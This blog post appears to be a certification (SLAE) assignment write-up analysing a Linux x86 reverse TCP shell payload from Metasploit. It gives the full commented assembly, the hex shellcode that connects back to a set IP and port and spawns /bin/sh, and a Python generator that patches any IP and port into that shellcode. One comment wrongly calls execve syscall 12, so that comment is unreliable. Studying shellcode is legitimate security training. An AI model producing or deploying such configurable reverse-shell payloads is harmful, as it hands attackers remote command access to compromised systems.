Back to Posts

Share this post

SLAE – Assignment #2: Reverse TCP Shell

Posted by: voidsec

Reading Time: 3 minutes

Assignment #2: Reverse TCP Shell

Create a shell_reverse_tcp shellcode that connects back to an IP address, on a specific a port and execute a shell. The IP address and port number should be easy configurable.

Again, instead of going for the path of writing a C TCP reverse shell from scratch, I decided to generate a raw Metasploit payload and analyze it with libemu.

Analyzing the Shellcode

All the code is also available on GitHub.

This time the analysis will be a lot shorter due the fact that we can reuse a lot of the code that we had already analyzed the previous assignment.

I’ve generated the graph with libemu in order to simplify our analysis:

Analyzing the image, we can understand that the shellcode needs to perform the following steps:

  1. Create a socket
  2. Duplicate the file descriptors
  3. Connect to the specified IP and port
  4. Execute /bin/sh via execve

ASM:

;----------- Create Socket ----------------------------
xor ebx,ebx            ; resetting the registers
mul ebx
push ebx               ; 0 (protocol)
inc ebx                ; ebx = 1
push ebx               ; 1 (SOCK_STREAM)
push byte +0x2         ; 2 (AF_INET)
mov ecx,esp            ; ecx = args array struct
mov al,0x66            ; syscall 102 (socketcall)
int 0x80	       ; syscall
;----------- Duplicate the file descriptor ------------
xchg eax,ebx
pop ecx
mov al,0x3f            ; syscall 63 (dup)
int 0x80               ; syscall
dec ecx                ; decrement counter
jns 0x11               ;loop
;----------- Connect -----------------------------------
push dword 0x100a8c0   ; pushing IP address (1.0.168.192) 
push dword 0x5c110002  ; pushing port number 4444
mov ecx,esp
mov al,0x66            ; socket syscall
push eax
push ecx
push ebx
mov bl,0x3             ; type of socketcall (3=connect)
mov ecx,esp            ; stack pointer to sockaddr_structure
int 0x80               ; syscall
;----------- Execve -----------------------------------
push edx
push dword 0x68732f6e  ; hs//
push dword 0x69622f2f  ; nib/
mov ebx,esp	       ; ebx = //bin/sh
push edx
push ebx
mov ecx,esp            ; argv = [filename,0]
mov al,0xb             ; syscall 12 (execve)
int 0x80               ; syscall

Here the HEX encoded Metasploit payload:

\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0\xa8\x00\x01\x68\x02\x00\x11\x5c\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80

Knowing that our shellcode was configured for port 4444 (hex 5c11, accounting the endianness) and IP address, I built a simple python script allowing me to easily replace the port and IP address in our shellcode.

# Paolo Stagno aka [VoidSec](https://voidsec.com)
# SLAE-1511
#!/usr/bin/env python

import sys;
if (len(sys.argv) != 3):
  print ("usage: " + sys.argv[0] + " ip port");
  sys.exit(-1)
else:	
  ip = sys.argv[1]
  hip = "\\x"+"\\x".join([hex(int(x)+256)[3:] for x in ip.split('.')])
  port = int(sys.argv[2])
  if port < 0 or port > 65535:
    print "[!] Invalid TCP port number {}, must be between 0-65535".format(port)
    sys.exit(-1)
  
# convert to hex and strip 0x
hport=hex(port).strip("0x")
# add an \\x every 2 chars
hport="\\x"+"\\x".join(a+b for a,b in zip(hport[::2],hport[1::2]))

shellcode="\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\\x6a\\x02\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x93\\x59\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x68{}\\x68\\x02\\x00{}\\x89\\xe1\\xb0\\x66\\x50\\x51\\x53\\xb3\\x03\\x89\\xe1\\xcd\\x80\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80".format(hip,hport)

print "Reverse TCP shellcode connecting to {}:{} - {}:{}".format(ip,port,hip,hport)
print "\n"+shellcode

SLAE Exam Statement

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE-1511

Back to Posts